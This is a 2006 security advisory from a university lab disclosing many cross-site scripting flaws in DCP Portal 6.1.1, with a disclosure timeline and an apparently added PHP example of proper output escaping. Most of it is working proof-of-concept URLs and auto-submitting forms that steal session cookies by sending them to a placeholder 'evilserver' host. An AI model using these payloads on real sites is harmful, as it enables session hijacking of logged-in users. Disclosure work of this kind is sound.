DCP Portal (www.dcp-portal.com)
Versions 6.1.1 and prior.
There are multiple cross-site scripting (XSS) vulnerabilities, which can be verified with the following
proof-of-concept exploits (the user needs to be logged in). They are roughly sorted by entry point (i.e., the
name of the file that has to be requested). The vulnerabilities were discovered under the assumption that
register_globals is on and that magic_quotes_gpc is off.
index.php, 380:
http://localhost/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html"><script
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
index.php, 690:
http://localhost/dcp-portal611/index.php?page=send_write&url=xyz.html"><script
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
calendar.php:
55: like 52
62:
77:
<form
action='http://localhost/dcp-portal611/calendar.php?show=full_month&month=02&day="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="text" name="year" value='2006' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
86:
using $_REQUEST['year'], 'month' or 'day':
92: analogous to lines 52 and 55 ($images)
149: $_REQUEST['year'] again
151: $_REQUEST['year'] again
between lines 199 and 219: $_REQUEST[*] again (nine times)
223:
echoing the value returned by function PrintCalendar (composes its
return value from $_REQUEST[*])
255: repeat
230: $subject_color, like 52
255: $_REQUEST['year']
257: $_REQUEST['year']
261: $_REQUEST['day']
forums.php:
95:
<form action='http://localhost/dcp-portal611/forums.php?action=board&bid=1' method="post">
<input type="text" name="bid"
value='"></a><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
140:
194:
<form action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="subject"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
198:
<form action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="body"
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
207:
231:
<form action='http://localhost/dcp-portal611/forums.php?action=savemsg' method="post">
<input type="text" name="bid"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
inbox.php:
127:
<form action='http://localhost/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="subject"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="message" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
133:
<form action='http://localhost/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="message"
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
/>
<input type="text" name="subject" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
353:
<form
action='http://localhost/dcp-portal611/inbox.php?action=delete&subject="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
automatic submission via JavaScript does not work here
359: analogous to 353
<form
action='http://localhost/dcp-portal611/inbox.php?action=delete&message="></textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
222: $content_inicial again
248: $c_name again
315:
326: $content_inicial again
362: $c_name again
404: $action_submit, via $cid (analogous to 315)
414: $content_inicial again
444: $c_name again
search.php:
81:
<form
action='http://localhost/dcp-portal611/search.php?field=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="text" name="q" value="xyz"/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
81:
<form action='http://localhost/dcp-portal611/search.php' method="post">
<input type="text" name="q"
value='<script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>
method="post">'/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
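The pattern behind the entries above is request input ($_REQUEST['year'] and friends, or a register_globals variable) written straight into HTML. The following is an added example, not code from DCP Portal, that shows the calendar.php year field and form action in that vulnerable shape beside hardened versions; the function names are assumptions chosen for illustration.

```php
<?php
// Added example (not DCP Portal code): the output pattern behind the
// calendar.php entries above, in vulnerable and hardened form.
// Function names are assumptions chosen for illustration.

// Vulnerable: with register_globals on, $year arrives straight from the
// request, and with magic_quotes_gpc off its double quote survives, so a
// value such as  2006"><script>...</script>  closes the attribute and the
// remainder is rendered as markup.
function render_year_field_vulnerable($year) {
    return "<input type=\"text\" name=\"year\" value=\"$year\" />";
}

// Hardened: encode once, at the point of output, for the context the value
// lands in. ENT_QUOTES also covers single quotes, which matters because the
// forms above use single-quoted attribute values as well.
function h($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

function render_year_field($year) {
    return '<input type="text" name="year" value="' . h($year) . '" />';
}

// Stricter still for a numeric field: validate the shape first, so no
// markup can be present at all (falls back to the current year).
function render_year_field_validated($year) {
    if (!preg_match('/^\d{4}$/', (string) $year)) {
        $year = date('Y');
    }
    return '<input type="text" name="year" value="' . $year . '" />';
}

// The calendar.php form action (line 77 above) needs two layers: URL-encode
// each parameter for the query string, then HTML-encode the resulting URL
// for the attribute it sits in.
function calendar_form_action($month, $day) {
    $query = http_build_query(['show' => 'full_month', 'month' => $month, 'day' => $day]);
    return '<form action="calendar.php?' . h($query) . '" method="post">';
}

// Constructed hostile input in the shape of the payloads above (benign marker).
$hostile = '2006"><script>alert(1)</script>';

echo render_year_field_vulnerable($hostile), "\n";  // attribute broken, script injected
echo render_year_field($hostile), "\n";             // quotes and brackets entity-encoded
echo render_year_field_validated($hostile), "\n";   // rejected, default year used
echo calendar_form_action('02', $hostile), "\n";    // hostile characters percent-encoded
```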
The authors have not responded to our messages, so there is no solution to these issues yet.
Timeline:
February 19, 2006:
Vulnerabilities reported to andy at codeworx dot ca; no response.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at